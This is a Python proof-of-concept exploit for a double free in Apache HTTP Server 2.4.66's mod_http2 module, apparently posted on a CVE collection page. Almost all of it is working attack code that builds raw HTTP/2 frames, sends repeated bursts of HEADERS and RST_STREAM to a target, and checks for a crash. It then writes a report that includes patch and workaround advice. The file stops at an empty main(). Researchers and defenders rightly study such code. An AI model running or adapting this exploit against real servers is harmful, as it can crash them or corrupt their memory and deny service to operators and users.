# 5465 Total CVEs
# 26 Years
# GitHub
# README.md
# Rendering markdown...
# POC / poc.py PY
#!/usr/bin/env python3
"""
CVE-2026-23918 PoC - Apache HTTP Server mod_http2 Double Free (Early Reset)
===========================================================================
VULNERABILITY: Double Free in Apache HTTP Server 2.4.66 when mod_http2
handles early RST_STREAM frames. The bug is in h2_mplx.c where
`m_stream_cleanup()` can add a stream to `m->spurge` array twice when
an RST_STREAM arrives before the worker thread starts processing.

AFFECTED:  Apache HTTP Server 2.4.66 with mod_http2 + Event MPM
FIXED IN:  2.4.67 (mod_h2 v2.0.37: "Prevent double purge of a stream")
CVSS 3.1:  8.8 (HIGH) - Unauthenticated Remote Code Execution possible
CWE:       CWE-415 (Double Free)
SVN FIXES: r1930444, r1930796

TRIGGER: Client sends HEADERS frame followed IMMEDIATELY by RST_STREAM
on the same stream ID. If the timing hits the window where the stream
is registered but processing hasn't started, `m_stream_cleanup()` adds
the stream to `m->spurge` (the purge array). Without the deduplication
check (`add_for_purge()` added in v2.0.37), the same stream can be
added again during mplx/connection cleanup → double pool destruction
→ double free → heap corruption.

DISCLAIMER: For authorized security testing and research only.
This tool requires explicit permission to test against any target.
"""

from __future__ import annotations

import argparse
import json
import os
import socket
import ssl
import struct
import sys
import textwrap
import time
from dataclasses import dataclass
from enum import Enum
from typing import Optional, List, Tuple

# Use hpack for proper HPACK encoding
try:
    from hpack import Encoder as HpackEncoder
    HAS_HPACK = True
except ImportError:
    HAS_HPACK = False

# Use requests for HTTP/1.1 version probing
try:
    import requests
    HAS_REQUESTS = True
except ImportError:
    HAS_REQUESTS = False

# ─── Constants ───────────────────────────────────────────────────────
# Client connection preface: the fixed octet sequence a client sends first.
H2_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"

# Frame type codes (RFC 7540 §6)
FRAME_DATA          = 0x00
FRAME_HEADERS       = 0x01
FRAME_PRIORITY      = 0x02
FRAME_RST_STREAM    = 0x03
FRAME_SETTINGS      = 0x04
FRAME_PUSH_PROMISE  = 0x05
FRAME_PING          = 0x06
FRAME_GOAWAY        = 0x07
FRAME_WINDOW_UPDATE = 0x08
FRAME_CONTINUATION  = 0x09

# Frame flag bits. ACK and END_STREAM share the same bit; which one it means
# depends on the frame type the flag byte belongs to.
FLAG_ACK         = 0x01
FLAG_END_STREAM  = 0x01
FLAG_END_HEADERS = 0x04

# Error codes carried by RST_STREAM / GOAWAY, in numeric order
ERR_NO_ERROR       = 0x00
ERR_PROTOCOL_ERROR = 0x01
ERR_INTERNAL_ERROR = 0x02
ERR_REFUSED_STREAM = 0x07
ERR_CANCEL         = 0x08


# ─── Frame Builder ───────────────────────────────────────────────────
@dataclass
class Frame:
    """One HTTP/2 frame: type, flags, stream identifier and payload.

    The same class is used for frames that are about to be sent and for
    frames parsed off the wire.
    """
    type_: int          # frame type code, must fit in one byte
    flags: int          # flag bits, must fit in one byte
    stream_id: int      # stream identifier; only the low 31 bits are sent
    payload: bytes = b""

    def serialize(self) -> bytes:
        """Return the wire form: a 9-byte header followed by the payload.

        Header layout: 3-byte big-endian payload length, 1-byte type,
        1-byte flags, 4-byte big-endian stream id with the top (reserved)
        bit cleared.

        Raises:
            ValueError: if the payload does not fit the 24-bit length field,
                or if ``type_`` / ``flags`` are outside 0..255.
        """
        length = len(self.payload)
        # The length field is only 24 bits wide. Dropping the high byte of a
        # larger value would produce a header that lies about the payload
        # size, so refuse instead of emitting a corrupt frame.
        if length > 0xFFFFFF:
            raise ValueError(
                f"payload of {length} bytes exceeds the 24-bit frame length field")
        header = (
            length.to_bytes(3, "big")
            + bytes((self.type_, self.flags))   # raises ValueError outside 0..255
            + struct.pack("!I", self.stream_id & 0x7FFFFFFF)
        )
        return header + self.payload


def build_settings_frame(ack: bool = False) -> Frame:
    """Build an empty SETTINGS frame on stream 0, optionally flagged as an ACK."""
    settings_flags = 0
    if ack:
        settings_flags = FLAG_ACK
    return Frame(FRAME_SETTINGS, settings_flags, 0, b"")


def build_headers_frame(stream_id: int, headers: List[Tuple[str, str]],
                         end_stream: bool = False,
                         end_headers: bool = True,
                         encoder: Optional[HpackEncoder] = None) -> Frame:
    """Build a HEADERS frame whose payload is the HPACK encoding of *headers*.

    Args:
        stream_id: Stream the frame belongs to.
        headers: ``(name, value)`` pairs, passed to ``encoder.encode`` as-is.
        end_stream: Set the END_STREAM flag.
        end_headers: Set the END_HEADERS flag.
        encoder: HPACK encoder to use. When omitted a fresh ``HpackEncoder``
            is created for this one frame.

    Raises:
        RuntimeError: if no encoder is supplied and the optional ``hpack``
            package could not be imported.
    """
    if encoder is None:
        # HpackEncoder only exists when the optional import succeeded; fail
        # with an actionable message rather than a bare NameError.
        if not HAS_HPACK:
            raise RuntimeError(
                "the 'hpack' package is required to encode HEADERS frames "
                "(pip install hpack)")
        encoder = HpackEncoder()
    payload = encoder.encode(headers)
    flags = 0
    if end_stream:
        flags |= FLAG_END_STREAM
    if end_headers:
        flags |= FLAG_END_HEADERS
    return Frame(
        type_=FRAME_HEADERS,
        flags=flags,
        stream_id=stream_id,
        payload=payload,
    )


def build_rst_stream_frame(stream_id: int, error_code: int = ERR_CANCEL) -> Frame:
    """Build an RST_STREAM frame for *stream_id*.

    The payload is *error_code* packed as one unsigned 32-bit big-endian
    integer; no flags are set.
    """
    body = struct.pack("!I", error_code)
    return Frame(FRAME_RST_STREAM, 0, stream_id, body)


def build_window_update(stream_id: int, increment: int = 65535) -> Frame:
    """Build a WINDOW_UPDATE frame for *stream_id*.

    Only the low 31 bits of *increment* are sent; the value is packed as an
    unsigned 32-bit big-endian integer.
    """
    masked_increment = increment & 0x7FFFFFFF
    body = struct.pack("!I", masked_increment)
    return Frame(FRAME_WINDOW_UPDATE, 0, stream_id, body)


def build_ping_frame(data: bytes = b"\x00" * 8, ack: bool = False) -> Frame:
    """Build a PING frame on stream 0 carrying *data*, optionally as an ACK.

    *data* is used as the payload unchanged; its length is not checked here.
    """
    ping_flags = 0
    if ack:
        ping_flags = FLAG_ACK
    return Frame(FRAME_PING, ping_flags, 0, data)


def build_goaway_frame(last_stream_id: int = 0,
                        error_code: int = ERR_NO_ERROR) -> Frame:
    """Build a GOAWAY frame on stream 0.

    The payload is two unsigned 32-bit big-endian integers: the low 31 bits
    of *last_stream_id*, then *error_code*.
    """
    last_id = last_stream_id & 0x7FFFFFFF
    body = struct.pack("!II", last_id, error_code)
    return Frame(FRAME_GOAWAY, 0, 0, body)


# ─── Raw H2 Connection ───────────────────────────────────────────────
class H2Connection:
    """
    Low-level HTTP/2 connection handler.

    Frames are built and written to the socket by hand rather than through
    an HTTP/2 library, so the caller decides exactly which frames are sent
    and in what order.

    Attributes:
        host, port: Peer address passed to ``socket.connect``.
        use_tls: When true, ``connect`` wraps the socket in TLS and requires
            ALPN to select ``h2``.
        timeout: Default socket timeout in seconds.
        sock: The connected socket; ``None`` before ``connect`` and after a
            failed ``connect``.
        last_error: Exception that made the most recent ``connect`` fail,
            or ``None``.
    """

    def __init__(self, host: str, port: int, use_tls: bool = True,
                 timeout: float = 10.0):
        self.host = host
        self.port = port
        self.use_tls = use_tls
        self.timeout = timeout
        self.sock: Optional[socket.socket] = None
        self.last_error: Optional[BaseException] = None
        self._encoder = HpackEncoder() if HAS_HPACK else None
        # NOTE(review): ":scheme" is always "https", even when use_tls is
        # False. Left unchanged so the bytes on the wire stay the same.
        self._headers = [
            (":method", "GET"),
            (":path", "/"),
            (":scheme", "https"),
            (":authority", host),
        ]
        self._next_stream_id = 1

    # ── Connection management ──────────────────────────────────────

    def connect(self) -> bool:
        """Open the TCP (and optionally TLS) connection and do the handshake.

        Returns:
            True when the socket is connected and ``_handshake`` succeeded.
            On any failure the socket is closed, ``sock`` is reset to
            ``None``, the exception (if any) is kept in ``last_error`` and
            False is returned.
        """
        self.last_error = None
        try:
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sock.settimeout(self.timeout)
            self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
            self.sock.connect((self.host, self.port))

            if self.use_tls:
                ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
                ctx.check_hostname = False
                ctx.verify_mode = ssl.CERT_NONE
                ctx.set_alpn_protocols(["h2"])
                ctx.minimum_version = ssl.TLSVersion.TLSv1_2

                self.sock = ctx.wrap_socket(self.sock, server_hostname=self.host)
                negotiated = self.sock.selected_alpn_protocol()
                if negotiated != "h2":
                    raise RuntimeError(
                        f"ALPN negotiation failed: got '{negotiated}'")

            if self._handshake():
                return True
        except Exception as exc:
            # Best-effort API: callers only look at the boolean, but keep the
            # cause around so it is not lost entirely.
            self.last_error = exc
        # Every failure path ends here; without this the half-open socket
        # stayed referenced and was never closed.
        self._discard_socket()
        return False

    def _discard_socket(self) -> None:
        """Close and forget the current socket, ignoring close errors."""
        sock, self.sock = self.sock, None
        if sock is not None:
            try:
                sock.close()
            except OSError:
                pass

    def _handshake(self) -> bool:
        """Send preface + SETTINGS, read the first server frame, ACK it.

        Returns False when nothing could be read or the first frame is
        GOAWAY; True otherwise. A non-ACK SETTINGS frame is acknowledged and
        the socket is drained before returning.
        """
        try:
            # Connection preface
            self._send_raw(H2_PREFACE)

            # Client SETTINGS (empty)
            self._send_frame(build_settings_frame(ack=False))

            # Read the first server frame with a shorter timeout
            self.sock.settimeout(5.0)
            frame = self._recv_frame()
            self.sock.settimeout(self.timeout)

            if frame is None or frame.type_ == FRAME_GOAWAY:
                return False

            if frame.type_ == FRAME_SETTINGS and not (frame.flags & FLAG_ACK):
                # ACK server settings, then discard whatever else is pending
                self._send_frame(build_settings_frame(ack=True))
                self._drain()
            return True
        except Exception:
            return False

    # ── Frame I/O ─────────────────────────────────────────────────

    def _send_frame(self, frame: Frame) -> bool:
        """Serialize and send one frame; False on any error."""
        try:
            self.sock.sendall(frame.serialize())
            return True
        except Exception:
            return False

    def _send_raw(self, data: bytes) -> bool:
        """Send raw bytes; False on any error."""
        try:
            self.sock.sendall(data)
            return True
        except Exception:
            return False

    def _recv_exact(self, n: int) -> Optional[bytes]:
        """Receive exactly *n* bytes, or None on EOF / error / timeout."""
        buf = bytearray()
        try:
            while len(buf) < n:
                chunk = self.sock.recv(n - len(buf))
                if not chunk:
                    return None
                buf += chunk
        except Exception:
            return None
        return bytes(buf)

    def _recv_frame(self) -> Optional[Frame]:
        """Receive one frame (9-byte header, then payload); None on failure."""
        hdr = self._recv_exact(9)
        if hdr is None:
            return None
        length = int.from_bytes(hdr[:3], "big")
        frame_type = hdr[3]
        flags = hdr[4]
        stream_id = struct.unpack("!I", hdr[5:9])[0] & 0x7FFFFFFF
        payload = b""
        if length > 0:
            payload = self._recv_exact(length)
            if payload is None:
                return None
        return Frame(type_=frame_type, flags=flags,
                     stream_id=stream_id, payload=payload)

    def _drain(self, timeout: float = 0.3):
        """Read and discard incoming data until EOF, an error, or *timeout*
        seconds pass without data; then restore the default timeout."""
        try:
            self.sock.settimeout(timeout)
            while self.sock.recv(65536):
                pass
        except Exception:
            # A timeout is the normal way out; other errors are ignored too.
            pass
        finally:
            self.sock.settimeout(self.timeout)

    # ── Exploit operations ────────────────────────────────────────

    def _headers_then_rst(self, stream_id: int) -> bytes:
        """Return the bytes of a HEADERS frame followed by RST_STREAM(CANCEL)
        for *stream_id*."""
        hdr = build_headers_frame(
            stream_id, self._headers,
            end_stream=False, encoder=self._encoder,
        )
        rst = build_rst_stream_frame(stream_id, ERR_CANCEL)
        return hdr.serialize() + rst.serialize()

    def send_exploit_stream(self, stream_id: int) -> bool:
        """
        Send HEADERS immediately followed by RST_STREAM on *stream_id*.
        Both frames go out in a single ``sendall`` call.
        """
        return self._send_raw(self._headers_then_rst(stream_id))

    def send_exploit_burst(self, count: int,
                            start_stream_id: int = 1) -> int:
        """
        Send *count* HEADERS+RST_STREAM pairs on consecutive odd-spaced
        stream ids starting at *start_stream_id*.

        All pairs are serialized before the first one is sent. Sending stops
        at the first failed write. A connection-level WINDOW_UPDATE is sent
        afterwards. Returns the number of pairs written.
        """
        payloads = [
            self._headers_then_rst(start_stream_id + (i * 2))
            for i in range(count)
        ]

        sent = 0
        for payload in payloads:
            if not self._send_raw(payload):
                break
            sent += 1

        # Keep connection flow control window open
        self._send_frame(build_window_update(0, 65535 * count))

        return sent

    def send_raw_exploit_burst(self, count: int,
                                start_stream_id: int = 1) -> int:
        """
        Alternative burst: send HEADERS on *count* streams first, then send
        RST_STREAM on each of them.

        Returns the number of HEADERS frames written; if one fails the
        method returns at once and no RST_STREAM frames are sent.
        """
        streams = list(range(start_stream_id, start_stream_id + count * 2, 2))
        sent = 0

        # Phase 1: open the streams
        for sid in streams:
            hdr = build_headers_frame(
                sid, self._headers,
                end_stream=False, encoder=self._encoder,
            )
            if not self._send_frame(hdr):
                return sent
            sent += 1

        # Phase 2: reset them
        for sid in streams:
            self._send_frame(build_rst_stream_frame(sid, ERR_CANCEL))

        return sent

    def ping(self) -> bool:
        """Send PING and wait up to 3 seconds for the matching PING ACK.

        Frames of any other kind that arrive first (SETTINGS ACK,
        WINDOW_UPDATE, RST_STREAM, ...) are read and skipped; previously the
        very first frame had to be the ACK, so unrelated traffic was
        reported as a dead peer.

        Returns:
            True when a PING frame with the ACK flag and the same 8-byte
            payload is received. False when the send fails, the connection
            ends, or the deadline passes. False therefore means "no ACK
            seen"; it does not by itself prove why.
        """
        pdata = os.urandom(8)
        if not self._send_frame(build_ping_frame(pdata, ack=False)):
            return False
        deadline = time.monotonic() + 3.0
        try:
            while True:
                remaining = deadline - time.monotonic()
                if remaining <= 0:
                    return False
                self.sock.settimeout(remaining)
                resp = self._recv_frame()
                if resp is None:
                    return False
                if (resp.type_ == FRAME_PING and (resp.flags & FLAG_ACK)
                        and resp.payload == pdata):
                    return True
        except Exception:
            return False
        finally:
            try:
                self.sock.settimeout(self.timeout)
            except Exception:
                # The socket may already be unusable; nothing to restore.
                pass

    def close(self):
        """Send GOAWAY (best effort) and close the socket."""
        if self.sock:
            try:
                self._send_frame(build_goaway_frame())
            except Exception:
                pass
            try:
                self.sock.close()
            except Exception:
                pass


# ─── Port Health Check ───────────────────────────────────────────────
def port_alive(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True when a TCP connection to ``host:port`` can be opened.

    Args:
        host: Hostname or IPv4 address.
        port: TCP port.
        timeout: Connect timeout in seconds.

    Returns:
        True if ``connect`` succeeds; False on refusal, timeout, resolution
        failure or an out-of-range port.
    """
    try:
        # The context manager closes the socket on every path; previously a
        # failed connect() left it open.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as probe:
            probe.settimeout(timeout)
            probe.connect((host, port))
        return True
    except (OSError, OverflowError, ValueError):
        return False


# ─── Version Detection ───────────────────────────────────────────────
def detect_version(host: str, port: int, use_tls: bool = True,
                   timeout: float = 5.0) -> dict:
    """Probe a server for its Apache version and HTTP/2 support.

    Two independent best-effort probes are made; a failure in either is
    ignored and leaves the corresponding fields at their defaults.

    1. An HTTP GET via ``requests`` (certificate verification disabled)
       reads the ``Server`` header and looks for ``h2`` in ``Upgrade``.
    2. With TLS, a handshake offering ALPN ``h2`` and ``http/1.1`` checks
       whether the server selects ``h2``.

    Args:
        host: Hostname or IPv4 address.
        port: TCP port.
        use_tls: Use ``https`` for probe 1 and run probe 2.
        timeout: Timeout in seconds for each probe.

    Returns:
        ``{"version": str, "server": str, "http2_support": bool}``.
        ``version`` and ``server`` are ``"unknown"`` when not detected. If
        ``requests`` is not installed the defaults are returned immediately
        and no probe is made.
    """
    info = {"version": "unknown", "server": "unknown", "http2_support": False}

    if not HAS_REQUESTS:
        return info

    scheme = "https" if use_tls else "http"
    try:
        r = requests.get(
            f"{scheme}://{host}:{port}/",
            timeout=timeout,
            verify=False,
            headers={"User-Agent": "Mozilla/5.0"},
        )
        info["server"] = r.headers.get("Server", "unknown")
        import re
        m = re.search(r"Apache/([\d.]+)", info["server"])
        if m:
            info["version"] = m.group(1)

        # Check for HTTP/2 via upgrade header in response
        # (not 100% reliable for direct h2, but indicates awareness)
        if "h2" in r.headers.get("Upgrade", ""):
            info["http2_support"] = True
    except Exception:
        pass

    # Try ALPN to detect h2 support
    if use_tls:
        try:
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE
            ctx.set_alpn_protocols(["h2", "http/1.1"])

            # Context managers close both sockets even when connect() or the
            # TLS handshake raises; previously the TCP socket leaked then.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as raw:
                raw.settimeout(timeout)
                raw.connect((host, port))
                with ctx.wrap_socket(raw, server_hostname=host) as tls:
                    negotiated = tls.selected_alpn_protocol()
            if negotiated == "h2":
                info["http2_support"] = True
        except Exception:
            pass

    return info


# ─── Main Exploit Class ──────────────────────────────────────────────
class CVE202623918:
    """
    CVE-2026-23918 test driver for Apache HTTP Server mod_http2 Double Free.

    ROOT CAUSE:
    In Apache 2.4.66 (mod_h2 v2.0.33-v2.0.36), when an RST_STREAM arrives
    before the stream's request is picked up by a worker thread (Event MPM),
    h2_mplx.c:m_stream_cleanup() adds the stream to m->spurge (the purge
    array). Since there was no deduplication check, the same stream could
    be pushed again during connection/mplx teardown.

    In v2.0.37, add_for_purge() was added to check if the stream is already
    scheduled for purging, preventing the double free.

    WHAT THIS CLASS DOES:
    ``check`` reads the server version and HTTP/2 support and turns them
    into an assessment. ``execute`` runs rounds of ``_run_burst`` (one
    connection per round), stops at the first sign of a crash, and returns
    a result dictionary.
    """

    # Release this class treats as affected, and the first one it treats as fixed.
    _AFFECTED = (2, 4, 66)

    def __init__(self, target: str, port: int = 443,
                 use_tls: bool = True, timeout: float = 10.0,
                 verbose: bool = False):
        self.target = target
        self.port = port
        self.use_tls = use_tls
        self.timeout = timeout
        self.verbose = verbose
        self._crashed = False

    def _log(self, msg: str, tag: str = "*"):
        """Print *msg* with a ``[tag]`` prefix and the current time.

        Unknown tags fall back to ``[*]``.
        """
        tags = {"*": "[*]", "+": "[+]", "-": "[-]", "!": "[!]"}
        prefix = tags.get(tag, "[*]")
        ts = time.strftime("%H:%M:%S")
        print(f"{prefix} [{ts}] {msg}")

    @staticmethod
    def _parse_version(version: str) -> Optional[Tuple[int, ...]]:
        """Turn ``"2.4.66"`` into ``(2, 4, 66)``.

        Returns None when the text is not at least three dot-separated
        integers (for example ``"unknown"`` or ``"2.4"``).
        """
        parts = version.split(".") if version else []
        if len(parts) < 3:
            return None
        try:
            return tuple(int(p) for p in parts)
        except ValueError:
            return None

    @classmethod
    def _assess(cls, version: str, http2_support: bool) -> Tuple[bool, str]:
        """Return ``(vulnerable, reason)`` for a detected version.

        Versions are compared numerically, component by component. Comparing
        the raw strings ranked "2.4.7" and "unknown" above "2.4.67" and
        "2.4.100" below "2.4.66".
        """
        parsed = cls._parse_version(version)
        if parsed is None:
            return False, "Version unknown - proceed with caution"

        release = parsed[:3]
        if release == cls._AFFECTED:
            if http2_support:
                return True, "Apache 2.4.66 with HTTP/2 support - VULNERABLE"
            return False, "Apache 2.4.66 but HTTP/2 not detected - may need h2 ALPN"
        if release < cls._AFFECTED:
            return False, f"Apache {version} < 2.4.66 - not affected"
        return False, f"Apache {version} >= 2.4.67 - likely patched"

    def check(self) -> dict:
        """Detect the server version and assess it without sending a burst.

        Returns:
            Dict with keys ``version``, ``server``, ``http2_support``,
            ``vulnerable`` and ``reason``.
        """
        info = detect_version(self.target, self.port, self.use_tls, self.timeout)
        vulnerable, reason = self._assess(info["version"], info["http2_support"])
        return {
            "version": info["version"],
            "server": info["server"],
            "http2_support": info["http2_support"],
            "vulnerable": vulnerable,
            "reason": reason,
        }

    def _run_burst(self, burst_size: int, conn_id: int = 0,
                    mode: str = "inline") -> Tuple[int, bool]:
        """
        Run one burst on a fresh connection.

        Args:
            burst_size: Number of HEADERS+RST pairs to send.
            conn_id: Label used in log lines only.
            mode: ``"inline"`` or ``"staged"``; anything else sends nothing.

        Returns:
            ``(pairs_sent, crashed)``. ``crashed`` is True when at least one
            pair was sent and the follow-up PING was not acknowledged.
        """
        conn = H2Connection(
            self.target, self.port,
            use_tls=self.use_tls, timeout=self.timeout,
        )

        if not conn.connect():
            self._log(f"Conn#{conn_id}: Connection failed", "-")
            # Release whatever socket a partial connect left behind.
            conn.close()
            return 0, False

        try:
            if mode == "inline":
                # Both frames in one send() call
                sent = conn.send_exploit_burst(burst_size)
            elif mode == "staged":
                # Open all, then reset all
                sent = conn.send_raw_exploit_burst(burst_size)
            else:
                sent = 0

            self._log(
                f"Conn#{conn_id}: Sent {sent}/{burst_size} HEADERS+RST pairs",
                "+" if sent > 0 else "-",
            )

            crashed = False
            if sent > 0:
                if not conn.ping():
                    crashed = True
                    self._log(f"Conn#{conn_id}: PING failed - server likely crashed!", "+")
                elif self.verbose:
                    # Only shown with --verbose. The old code passed an empty
                    # tag, which fell back to "[*]" and printed regardless.
                    self._log(f"Conn#{conn_id}: Server alive (PING OK)")
        finally:
            conn.close()
        return sent, crashed

    def _run_alternate_phase(self, label: str, mode: str, conn_base: int,
                             rounds: int, burst_size: int,
                             delay: float) -> Tuple[int, int]:
        """Run the phase-2 rounds in *mode*; returns ``(streams_sent, crashes)``.

        Stops as soon as a crash is flagged. From the second round on, the
        port is probed first and an unreachable port counts as a crash.
        """
        total_sent = 0
        crashes = 0
        for i in range(rounds):
            if self._crashed:
                break
            if i > 0 and not port_alive(self.target, self.port, 2.0):
                self._crashed = True
                crashes += 1
                break
            self._log(f"  {label} round {i+1}/{rounds}")
            sent, crashed = self._run_burst(
                burst_size, conn_id=conn_base + i, mode=mode)
            total_sent += sent
            if crashed:
                crashes += 1
                self._crashed = True
            if not self._crashed:
                time.sleep(delay)
        return total_sent, crashes

    def execute(self, iterations: int = 10, burst_size: int = 200,
               delay: float = 0.3, mode: str = "inline") -> dict:
        """
        Run the full test and return a result dictionary.

        Phase 1 runs up to *iterations* rounds in *mode*. If no crash was
        flagged, phase 2 runs ``iterations // 2`` rounds in the other mode.

        Args:
            iterations: Number of phase-1 rounds
            burst_size: HEADERS+RST_STREAM pairs per round
            delay: Seconds between rounds
            mode: 'inline' (HEADERS+RST in one send) or 'staged' (all headers then all RSTs)

        Returns:
            Dict with the pre-check fields, the parameters used, totals,
            ``crash_confirmed``, ``port_alive`` and the phase-1 ``rounds`` log.
        """
        # Pre-check
        check = self.check()
        self._log(f"Target: {self.target}:{self.port}")
        self._log(f"Version: {check['version']} | Server: {check['server']}")
        self._log(f"HTTP/2: {'Yes' if check['http2_support'] else 'No/Unknown'}")
        self._log(f"Assessment: {check['reason']}")

        print()

        total_sent = 0
        crashes = 0
        round_log = []

        for i in range(iterations):
            if self._crashed:
                self._log("Crash already confirmed - stopping further iterations", "!")
                break

            # Pre-iteration health check
            if i > 0 and not port_alive(self.target, self.port, 2.0):
                self._log("Port is DOWN - crash CONFIRMED!", "+")
                crashes += 1
                self._crashed = True
                break

            self._log(f"Round {i+1}/{iterations} [{mode} mode, burst={burst_size}]")

            sent, crashed = self._run_burst(burst_size, conn_id=i, mode=mode)
            total_sent += sent
            if crashed:
                crashes += 1
                self._crashed = True

            round_log.append({
                "round": i + 1,
                "streams_sent": sent,
                "crashed": crashed,
            })

            if not self._crashed and i < iterations - 1:
                time.sleep(delay)

        # Phase 2: try the other mode if the first one did not flag a crash.
        # value = (other mode, log label, conn_id base, announcement)
        alternates = {
            "inline": ("staged", "Staged", 100,
                       "Phase 2: Trying staged mode (burst first, then reset)..."),
            "staged": ("inline", "Inline", 200,
                       "Phase 2: Trying inline mode (HEADERS+RST in one send)..."),
        }
        if not self._crashed and mode in alternates:
            other_mode, label, conn_base, announcement = alternates[mode]
            self._log(announcement)
            extra_sent, extra_crashes = self._run_alternate_phase(
                label, other_mode, conn_base,
                iterations // 2, burst_size, delay,
            )
            total_sent += extra_sent
            crashes += extra_crashes

        # Final health check
        final_alive = port_alive(self.target, self.port, 3.0)

        result = {
            "target": f"{self.target}:{self.port}",
            "version": check["version"],
            "server": check["server"],
            "http2_support": check["http2_support"],
            "vulnerable": check["vulnerable"],
            "iterations": iterations,
            "burst_size": burst_size,
            "mode": mode,
            "total_streams_sent": total_sent,
            "crashes": crashes,
            "crash_confirmed": self._crashed,
            "port_alive": final_alive,
            "rounds": round_log,
        }

        # Summary
        print()
        self._log("=" * 60)
        if self._crashed:
            self._log("CRASH CONFIRMED - Target is VULNERABLE to CVE-2026-23918", "+")
        else:
            self._log("No crash detected", "-")
            self._log("Possible reasons:", "!")
            self._log("  - Target is not Apache 2.4.66", "!")
            self._log("  - HTTP/2 not enabled (mod_http2)", "!")
            self._log("  - Event MPM not in use", "!")
            self._log("  - Target already patched (2.4.67+)", "!")
            self._log("  - Need more iterations or larger burst", "!")
        self._log(f"Total streams sent: {total_sent}")
        self._log(f"Port status: {'ALIVE' if final_alive else 'DEAD/UNREACHABLE'}")
        self._log("=" * 60)

        return result


# ─── Report Generator ────────────────────────────────────────────────
def generate_report(result: dict, filepath: str):
    """Write a Markdown report for *result* to *filepath* (UTF-8).

    The report has a summary table, a parameter table, a fixed technical
    background section, and a conclusion chosen by
    ``result["crash_confirmed"]``. Lines are joined with ``"\\n"`` and no
    trailing newline is written.

    Args:
        result: Dict with the keys ``target``, ``version``, ``server``,
            ``http2_support``, ``vulnerable``, ``iterations``,
            ``burst_size``, ``mode``, ``total_streams_sent``, ``crashes``,
            ``crash_confirmed`` and ``port_alive``.
        filepath: Destination path; an existing file is overwritten.
    """
    h2_text = "Yes" if result["http2_support"] else "No/Unknown"
    assessed_text = "Vulnerable" if result["vulnerable"] else "Unknown/Not"
    confirmed_text = "YES" if result["crash_confirmed"] else "NO"
    alive_text = "Yes" if result["port_alive"] else "No"
    stamp = time.strftime("%Y-%m-%d %H:%M:%S")

    summary = [
        "# CVE-2026-23918 Exploit Report",
        "",
        "| Field | Value |",
        "|-------|-------|",
        "| **Target** | `{}` |".format(result["target"]),
        "| **Date** | {} |".format(stamp),
        "| **Apache Version** | {} |".format(result["version"]),
        "| **Server Header** | `{}` |".format(result["server"]),
        "| **HTTP/2 Support** | {} |".format(h2_text),
        "| **Pre-assessed** | {} |".format(assessed_text),
        "",
    ]

    parameters = [
        "## Exploit Parameters",
        "",
        "| Parameter | Value |",
        "|-----------|-------|",
        "| Iterations | {} |".format(result["iterations"]),
        "| Burst size | {} |".format(result["burst_size"]),
        "| Attack mode | {} |".format(result["mode"]),
        "| Total streams sent | {} |".format(result["total_streams_sent"]),
        "| Crashes detected | {} |".format(result["crashes"]),
        "| Crash confirmed | **{}** |".format(confirmed_text),
        "| Port alive (final) | {} |".format(alive_text),
        "",
    ]

    # Fixed text; some lines end in a space on purpose (Markdown line wrap).
    background = [
        "## Technical Background",
        "",
        "CVE-2026-23918 is a **double-free vulnerability** (CWE-415) in ",
        "Apache HTTP Server's `mod_http2` module.",
        "",
        "### Affected Code Path",
        "",
        "The bug resides in `modules/http2/h2_mplx.c`:",
        "",
        "```c",
        "static void m_stream_cleanup(h2_mplx *m, h2_stream *stream)",
        "{",
        "    // ... various checks ...",
        "",
        "    // Case: stream was submitted but not yet started",
        "    // (early RST_STREAM before worker picked it up)",
        "    else {",
        "        /* never started */",
        "        APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream;  // FIRST PUSH",
        "    }",
        "}",
        "```",
        "",
        "Later, during `h2_mplx_destroy()` or connection cleanup, ",
        "another code path may also push the same stream to `m->spurge`:",
        "",
        "```c",
        "static void c1c2_stream_joined(h2_mplx *m, h2_stream *stream)",
        "{",
        "    // ... ",
        "    APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream;  // SECOND PUSH!",
        "}",
        "```",
        "",
        "Without deduplication, both pushes reference the same stream pool.",
        "When `h2_mplx_destroy()` iterates `m->spurge`, it destroys the ",
        "pool **twice** → double free → heap corruption.",
        "",
        "### The Fix (mod_h2 v2.0.37 / Apache 2.4.67)",
        "",
        "```c",
        "static int add_for_purge(h2_mplx *m, h2_stream *stream)",
        "{",
        "    int i;",
        "    for (i = 0; i < m->spurge->nelts; ++i) {",
        "        h2_stream *s = APR_ARRAY_IDX(m->spurge, i, h2_stream*);",
        "        if (s == stream) /* already scheduled for purging */",
        "            return FALSE;",
        "    }",
        "    APR_ARRAY_PUSH(m->spurge, h2_stream *) = stream;",
        "    return TRUE;",
        "}",
        "```",
    ]

    confirmed_conclusion = [
        "",
        "## Conclusion",
        "",
        "**The target IS VULNERABLE to CVE-2026-23918.**",
        "",
        "### Recommended Actions",
        "",
        "1. **Immediate:** Upgrade Apache HTTP Server to **2.4.67+**",
        "2. **Workaround:** Remove `h2` from the `Protocols` directive in httpd.conf",
        "3. **Alternative:** Apply the mod_h2 v2.0.37 backport (cPanel EA-13319)",
        "4. **Detection:** Monitor for repeated Apache child process crashes",
        "   in error.log with mod_http2 stack traces",
    ]

    unconfirmed_conclusion = [
        "",
        "## Conclusion",
        "",
        "Crash was NOT confirmed in this test run.",
        "",
        "### Possible Reasons:",
        "- Target is not Apache 2.4.66 or already patched to 2.4.67+",
        "- mod_http2 not loaded or HTTP/2 disabled via configuration",
        "- Event MPM not in use (race condition requires thread/process scheduling gap)",
        "- Network conditions prevented hitting the race window",
        "",
        "### Suggestions:",
        "- Increase iterations (`-n 50`) and burst size (`-b 1000`)",
        "- Try both `--mode inline` and `--mode staged`",
        "- Verify the target with `curl --http2 -k https://target/`",
    ]

    if result["crash_confirmed"]:
        conclusion = confirmed_conclusion
    else:
        conclusion = unconfirmed_conclusion

    document = "\n".join(summary + parameters + background + conclusion)
    with open(filepath, "w", encoding="utf-8") as out:
        out.write(document)


# ─── CLI ─────────────────────────────────────────────────────────────
def main():
